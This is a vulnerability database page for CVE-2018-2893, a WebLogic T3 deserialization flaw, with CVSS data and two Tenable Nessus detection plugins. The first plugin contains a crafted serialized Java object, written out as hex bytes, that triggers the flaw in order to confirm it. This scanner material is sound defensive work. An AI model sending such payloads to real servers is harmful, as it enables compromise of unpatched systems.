Vulnerabilities > CVE-2018-2893 - Unspecified vulnerability in Oracle Weblogic Server

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
oracle
nessus

Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Nessus

  • NASL familyWeb Servers
    NASL idWEBLOGIC_CVE_2018_2893.NASL
    descriptionThe remote Oracle WebLogic server is affected by a remote code execution vulnerability in the Core Components subcomponent due to unsafe deserialization of Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.
    last seen2020-06-01
    modified2020-06-02
    plugin id111665
    published2018-08-13
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/111665
    titleOracle WebLogic Server Deserialization RCE (CVE-2018-2893)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(111665);
      script_version("1.6");
      script_cvs_date("Date: 2019/04/05 23:25:09");
    
      script_cve_id("CVE-2018-2893");
      script_bugtraq_id(104763);
    
      script_name(english:"Oracle WebLogic Server Deserialization RCE (CVE-2018-2893)");
      script_summary(english:"Sends a Java remote object to trigger the exploit.");
      script_set_attribute(attribute:"synopsis", value:
    "The remote Oracle WebLogic server is affected by a remote code execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The remote Oracle WebLogic server is affected by a remote code
    execution vulnerability in the Core Components subcomponent due to
    unsafe deserialization of Java objects. An unauthenticated, remote attacker
    can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic
    server.");
    
      # http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?50f36723");
      script_set_attribute(attribute:"see_also", value:"https://github.com/anbai-inc/CVE-2018-2893");
      script_set_attribute(attribute:"see_also", value:"https://github.com/Ryaninf/CVE-2018-2893");
    
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch according to the July 2018 Oracle Critical Patch Update advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-2893");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/07/18");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/07/18");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/08/13");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
      script_end_attributes();
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_category(ACT_ATTACK);
      script_family(english:"Web Servers");
    
      script_dependencies("weblogic_detect.nasl","t3_detect.nasl");
      script_require_ports("Services/t3", 7001);
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("t3.inc");
    include('dump.inc');
    
    
    appname = "Oracle WebLogic Server";
    
    port = get_service(svc:'t3', default:7001, exit_on_fail:TRUE);
    
    # Try to talk T3 to the server
    sock = open_sock_tcp(port);
    if (!sock) audit(AUDIT_SOCK_FAIL, port);
    # T3 handshake
    version = t3_connect(sock:sock, port:port);
    
    # Only 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 are affected
    # i.e., 12.2.1.1 is not affected?
    if (version !~ "^10\.3\.6\." &&
        version !~ "^12\.1\.3\." &&
        version !~ "^12\.2\.1\.2($|[^0-9])" &&
        version !~ "^12\.2\.1\.3($|[^0-9])")
    {
      audit(AUDIT_INST_VER_NOT_VULN, appname, version);
    }
    
    # Send ident so we can move on to login
    t3_send_ident_request(sock:sock, port:port);
    
    # Send our "login request"
    auth_request = '\x05\x65\x08\x00\x00\x00\x01\x00\x00\x00\x1b\x00\x00\x00\x5d\x01\x01\x00\x73\x72\x01\x78\x70\x73\x72\x02\x78\x70\x00\x00\x00\x00\x00\x00\x00\x00\x75\x72\x03\x78\x70\x00\x00\x00\x00\x78\x74\x00\x08\x77\x65\x62\x6c\x6f\x67\x69\x63\x75\x72\x04\x78\x70\x00\x00\x00\x0c\x9c\x97\x9a\x9a\x8c\x9a\x9b\xcf\xcf\x9b\x93\x9a\x74\x00\x08\x77\x65\x62\x6c\x6f\x67\x69\x63\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x10\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x56\x65\x63\x74\x6f\x72\xd9\x97\x7d\x5b\x80\x3b\xaf\x01\x03\x00\x03\x49\x00\x11\x63\x61\x70\x61\x63\x69\x74\x79\x49\x6e\x63\x72\x65\x6d\x65\x6e\x74\x49\x00\x0c\x65\x6c\x65\x6d\x65\x6e\x74\x43\x6f\x75\x6e\x74\x5b\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x44\x61\x74\x61\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00';
    
    
    # Object to be de-serialized:
    auth_request += 
    '\xac\xed\x00\x05\x73\x72\x00\x25\x77\x65\x62\x6c\x6f\x67\x69\x63' +
    '\x2e\x6a\x6d\x73\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x53\x74\x72\x65' +
    '\x61\x6d\x4d\x65\x73\x73\x61\x67\x65\x49\x6d\x70\x6c\x6b\x88\xde' +
    '\x4d\x93\xcb\xd4\x5d\x0c\x00\x00\x78\x72\x00\x1f\x77\x65\x62\x6c' +
    '\x6f\x67\x69\x63\x2e\x6a\x6d\x73\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e' +
    '\x4d\x65\x73\x73\x61\x67\x65\x49\x6d\x70\x6c\x69\x12\x61\x61\xd0' +
    '\x4d\xf1\x42\x0c\x00\x00\x78\x70\x7a\x00\x00\x01\x25\x1e\x20\x00' +
    '\x00\x00\x00\x00\x00\x01\x00\x00\x01\x18\xac\xed\x00\x05\x73\x7d' +
    '\x00\x00\x00\x01\x00\x1a\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x72' +
    '\x65\x67\x69\x73\x74\x72\x79\x2e\x52\x65\x67\x69\x73\x74\x72\x79' +
    '\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65' +
    '\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc' +
    '\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61' +
    '\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f' +
    '\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65' +
    '\x72\x3b\x78\x70\x73\x72\x00\x2d\x6a\x61\x76\x61\x2e\x72\x6d\x69' +
    '\x2e\x73\x65\x72\x76\x65\x72\x2e\x52\x65\x6d\x6f\x74\x65\x4f\x62' +
    '\x6a\x65\x63\x74\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61' +
    '\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00' +
    '\x78\x72\x00\x1c\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72' +
    '\x76\x65\x72\x2e\x52\x65\x6d\x6f\x74\x65\x4f\x62\x6a\x65\x63\x74' +
    '\xd3\x61\xb4\x91\x0c\x61\x33\x1e\x03\x00\x00\x78\x70\x77\x32\x00' +
    '\x0a\x55\x6e\x69\x63\x61\x73\x74\x52\x65\x66\x00\x09\x31\x32\x37' +
    '\x2e\x30\x2e\x30\x2e\x31\x00\x00\xf1\x44\x00\x00\x00\x00\x46\x91' +
    '\x1f\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x78';
    
    auth_request += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x25\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x49\x6d\x6d\x75\x74\x61\x62\x6c\x65\x53\x65\x72\x76\x69\x63\x65\x43\x6f\x6e\x74\x65\x78\x74\xdd\xcb\xa8\x70\x63\x86\xf0\xba\x0c\x00\x00\x78\x72\x00\x29\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6d\x69\x2e\x70\x72\x6f\x76\x69\x64\x65\x72\x2e\x42\x61\x73\x69\x63\x53\x65\x72\x76\x69\x63\x65\x43\x6f\x6e\x74\x65\x78\x74\xe4\x63\x22\x36\xc5\xd4\xa7\x1e\x0c\x00\x00\x78\x70\x77\x02\x06\x00\x73\x72\x00\x26\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6d\x69\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x4d\x65\x74\x68\x6f\x64\x44\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x12\x48\x5a\x82\x8a\xf7\xf6\x7b\x0c\x00\x00\x78\x70\x77\x34\x00\x2e\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x65\x28\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x73\x65\x63\x75\x72\x69\x74\x79\x2e\x61\x63\x6c\x2e\x55\x73\x65\x72\x49\x6e\x66\x6f\x3b\x29\x00\x00\x00\x1b\x78\x78\xfe\x00\xff';
    send_t3(sock:sock, data:auth_request);
    ret = recv_t3(sock:sock);
    close(sock);
    
    if (isnull(ret) || 'StreamMessageImpl cannot be cast to weblogic' >!< ret)
    {
      audit(AUDIT_INST_VER_NOT_VULN, appname, version);
    }
    
    report =
      '\nNessus was able to exploit a Java deserialization vulnerability by' +
      '\nsending a crafted Java object and trigger an error message.' +
      '\n\nError message dump:\n\n' +
      hexdump(ddata:ret);
    
    security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
    
  • NASL familyMisc.
    NASL idORACLE_WEBLOGIC_SERVER_CPU_JUL_2018.NASL
    descriptionThe version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities: - An unspecified vulnerability in the Spring Framework (Sample Apps) subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-1275) - An unspecified vulnerability in the WLS Core Components subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker to takeover a WebLogic server. (CVE-2018-2893) - An unspecified vulnerability in the WLS - Web Services subcomponent in Oracle WebLogic allows an unauthenticated, remote attacker with HTTP access to compromise and takeover a WebLogic server. (CVE-2018-2894) In addition, Oracle WebLogic Server is affected by several other lower scoring vulnerabilities in the WLS Core Components, JSF, SAML, and Console (jackson-databind) subcomponents. Note that Nessus has not tested for these issues but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id111209
    published2018-07-20
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/111209
    titleOracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(111209);
      script_version("1.15");
      script_cvs_date("Date: 2019/04/30 14:00:04");
    
      script_cve_id(
        "CVE-2018-1275",
        "CVE-2018-2893",
        "CVE-2018-2894",
        "CVE-2018-2933",
        "CVE-2018-2935",
        "CVE-2018-2987",
        "CVE-2018-2998",
        "CVE-2018-7489"
      );
      script_bugtraq_id(
        103771,
        103203,
        104817
      );
    
      script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)");
      script_summary(english:"Checks for the patch.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An application server installed on the remote host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Oracle WebLogic Server installed on the remote host is
    affected by multiple vulnerabilities:
    
      - An unspecified vulnerability in the Spring Framework
        (Sample Apps) subcomponent in Oracle WebLogic allows
        an unauthenticated, remote attacker to takeover a
        WebLogic server. (CVE-2018-1275)
    
      - An unspecified vulnerability in the WLS Core Components
        subcomponent in Oracle WebLogic allows an
        unauthenticated, remote attacker to takeover a
        WebLogic server. (CVE-2018-2893)
    
      - An unspecified vulnerability in the WLS - Web Services
        subcomponent in Oracle WebLogic allows an
        unauthenticated, remote attacker with HTTP access to
        compromise and takeover a WebLogic server.
        (CVE-2018-2894)
    
    In addition, Oracle WebLogic Server is affected by several other lower
    scoring vulnerabilities in the WLS Core Components, JSF, SAML, and 
    Console (jackson-databind) subcomponents.
    
    Note that Nessus has not tested for these issues but has instead
    relied only on the application's self-reported version number."
      );
      # http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?50f36723");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch according to the July 2018 Oracle
    Critical Patch Update advisory.
    
    Refer to Oracle for any additional patch instructions or
    mitigation options.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-1275");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Oracle WebLogic Server WLS File Upload");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/07/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/07/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/07/20");
    
      script_set_attribute(attribute:"agent", value:"all");
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_weblogic_server_installed.nbin", "os_fingerprint.nasl");
      script_require_keys("installed_sw/Oracle WebLogic Server");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("install_func.inc");
    include("obj.inc");
    include("spad_log_func.inc");
    
    app_name = "Oracle WebLogic Server";
    
    install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);
    ohome = install["Oracle Home"];
    subdir = install["path"];
    version = install["version"];
    
    fix = NULL;
    fix_ver = NULL;
    
    spad_log(message:"checking version [" + version + "]");
    # individual security patches
    if (version =~ "^12\.2\.1\.3($|[^0-9])")
    {
      fix_ver = "12.2.1.3.180717";
      fix = make_list("27912627");
    }
    else if (version =~ "^12\.2\.1\.2($|[^0-9])")
    {
      fix_ver = "12.2.1.2.180717";
      fix = make_list("27741413");
    }
    else if (version =~ "^12\.1\.3\.")
    {
      fix_ver = "12.1.3.0.180717";
      fix = make_list("27919943");
    }
    else if (version =~ "^10\.3\.6\.")
    {
      fix_ver = "10.3.6.0.180717";
      fix = make_list("B47X"); # patchid is obtained from the readme and 10.3.6.x assets are different 
    }
    else
      audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
    
    spad_log(message:"checking fix [" + obj_rep(fix) + "]");
    PATCHED=FALSE;
    
    # Iterate over the list of patches and check the install for the patchID
    foreach id (fix)
    {
     spad_log(message:"Checking fix id: [" + id +"]");
     if (install[id])
     {
       PATCHED=TRUE;
       break;
     }
    }
    
    VULN=FALSE;
    if (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)
      VULN=TRUE;
    
    if (PATCHED || !VULN)
      audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
    
    os = get_kb_item_or_exit("Host/OS");
    if ('windows' >< tolower(os))
    {
        port = get_kb_item("SMB/transport");
          if (!port) port = 445;
    }
    else port = 0;
    
    report =
      '\n  Oracle Home    : ' + ohome +
      '\n  Install path   : ' + subdir +
      '\n  Version        : ' + version +
      '\n  Fixes          : ' + join(sep:", ", fix);
    
    security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);
    

Seebug

bulletinFamilyexploit
idSSV:97419
last seen2018-07-19
modified2018-07-18
published2018-07-18
reporterMy Seebug
titleWebLogic 反序列化远程命令执行漏洞(CVE-2018-2893)